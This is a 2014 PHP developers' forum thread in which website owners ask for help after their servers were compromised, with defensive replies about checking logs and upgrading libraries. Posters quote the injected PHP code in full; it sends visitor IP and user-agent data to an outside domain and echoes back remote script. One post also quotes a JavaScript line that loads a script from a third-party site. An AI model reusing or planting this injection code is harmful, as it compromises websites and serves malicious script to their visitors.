PHP Developers Network
http://forums.devnetwork.net/

Wierd files on server
http://forums.devnetwork.net/viewtopic.php?f=30&t=139020
Page 1 of 1

Author:  mikebr [ Thu Jan 09, 2014 5:33 pm ]
Post subject:  Wierd files on server

Hi,
I discovered that on Dec 25th and on Jan 4th some files where changed on a server account, I found the following code added to the file that is used to login to an admin side of an admin account:

Syntax: [ Download ] [ Hide ]
<?php
#4f9ad5#
error_reporting(0); ini_set('display_errors',0); $wp_li1101 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_li1101) && !preg_match ('/bot/i', $wp_li1101))){
$wp_li091101="http://"."error"."css".".com/css"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_li1101);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_li091101);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_1101li = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_1101li,1,3) === 'scr' ){ echo $wp_1101li; }
#/4f9ad5#
?>
<?php

?>
<?php

?>
<?php

?>
<?php

?>
<?php

?>
<?php

?>
<?php

?>
<?php

?>


This code was also in a php file placed in a directory called 'template', this was not placed there by myself and the directory has the same creation date as one of the dates where the other files where found to have been altered. The directory where the 'template' directory was located has not got write permissions.

I also seen that several jquery files where altered, they seemed to have all the '+' operators removed, this would just break the code, just didn't seem to make any logical sense.

This account has no other access apart from myself so it's not as if someone else could have done this without gaining access to the account, password has been changed but does anyone have any idea as to what might have been going on?

p.s. Needless to say the files have been replaced, removed and the password changed on the server.

Author:  requinix [ Thu Jan 09, 2014 6:36 pm ]
Post subject:  Re: Wierd files on server

There was an exploit somewhere, but I think that goes without saying.

If you want to track down where, take a look at your server error logs (like auth logs) and your web server access logs (like to look for abnormal requests). If you're on a shared server then it's a bit harder and it could be that someone else on the server did it, but if you are then you should get your hosting provider to help you track down the problem - it's a problem for them too.

By the way, write permissions on a directory only matter when making changes to what is in the directory, such as creating new files. Files can be edited regardless (as long as you have write permissions on the file).

Author:  mikebr [ Fri Jan 10, 2014 2:20 pm ]
Post subject:  Re: Wierd files on server

Thanks for the reply.

I looked at the error log and found the following:

Syntax: [ Download ] [ Hide ]
[Thu Jan 09 15:36:21 2014] [error] [client 188.143.234.6] File does not exist: /home/user/public_html/++++++++++++++++++++++++++++++++++++++Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Erafkayatte";+\xe2\xee\xe7\xec\xee\xe6\xed\xee,+\xee\xf2\xef\xf0\xe0\xe2\xeb\xe5\xed\xee;, referer: http://domain.com/+++++++++++++++++++++ ... %E5%ED%EE;
[Thu Jan 09 11:25:22 2014] [error] [client 194.154.83.18] File does not exist: /home/user/public_html/user, referer: domain.com
[Thu Jan 09 03:20:56 2014] [error] [client 103.31.200.92] File does not exist: /home/user/public_html/js/+d.href+, referer: http://www.domain.com/js/+d.href+
[Thu Jan 09 03:20:56 2014] [error] [client 103.31.200.92] File does not exist: /home/user/public_html/js/+(, referer: http://www.domain.com/js/+%28/%5ehttps/ ... href%7c%7c


I am puzeled and curious, does anyone know what is actually trying to be done here? I can't see much in hacked files where PHP was added except what looks like a URL transfer.
Anyone any idea?

Author:  Celauran [ Fri Jan 10, 2014 2:26 pm ]
Post subject:  Re: Wierd files on server

Looks like the error log is giving you a list of 404s from exploits he tried. I'd take a look at the access logs for the same time period as he eventually found one that worked.

Author:  Eric! [ Fri Jan 10, 2014 6:08 pm ]
Post subject:  Re: Wierd files on server


Author:  mikebr [ Sat Jan 11, 2014 4:54 am ]
Post subject:  Re: Wierd files on server


Author:  mikebr [ Sun Jan 12, 2014 11:19 am ]
Post subject:  Re: Wierd files on server

BTW, on looking at the logs I see an error in the last couple of days where the person was looking for js files on the server. I changed directory names after I found the problem so it seems someone was looking for the old js directory.

[text][Fri Jan 10 20:29:10 2014] [error] [client 180.76.6.16] File does not exist: /home/user/public_html/js

Thanks again for everyone who replied on this post.

Author:  Eric! [ Mon Jan 13, 2014 4:50 pm ]
Post subject:  Re: Wierd files on server

If you haven't upgraded all those libraries, you probably should as well as go through the release notes to see if you can find a security fix that matches the version and problem you witnessed. If you have the most recent libraries/files, then there might be a security flaw and it's just a matter of time before they re-index your domain and find the file again. In fact since you moved it and saw an error they might have already re-indexed your files.

Author:  Weirdan [ Tue Jan 14, 2014 10:27 pm ]
Post subject:  Re: Wierd files on server


Author:  apelissetti [ Thu Jan 16, 2014 6:46 pm ]
Post subject:  Re: Wierd files on server

I also had the same attack
The January 5 they injected this code in some .php file (index, header, footer,etc)

<?php
#a3e35a#
error_reporting(0); ini_set('display_errors',0); $wp_vqcs1 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_vqcs1) && !preg_match ('/bot/i', $wp_vqcs1))){
$wp_vqcs091="http://"."html"."-style".".com/style"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_vqcs1);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_vqcs091);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_1vqcs = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_1vqcs,1,3) === 'scr' ){ echo $wp_1vqcs; }
#/a3e35a#
?>

On January 15 they injected this code in all .js file of my server

/*38c393*/
document.write("<script src='http://www.ceprede.es/y2W8Ljrc.php?id=122690528' type='text/javascript'></" + "script>");
/*/38c393*/

the problem is that I have many sites on a single shared server, so I can not go back to where it started the attack

i think on some wp installation, but i don't know exactly

:(

Author:  requinix [ Thu Jan 16, 2014 7:41 pm ]
Post subject:  Re: Wierd files on server


Page 1 of 1 All times are UTC - 5 hours
Powered by phpBB® Forum Software © phpBB Group
http://www.phpbb.com/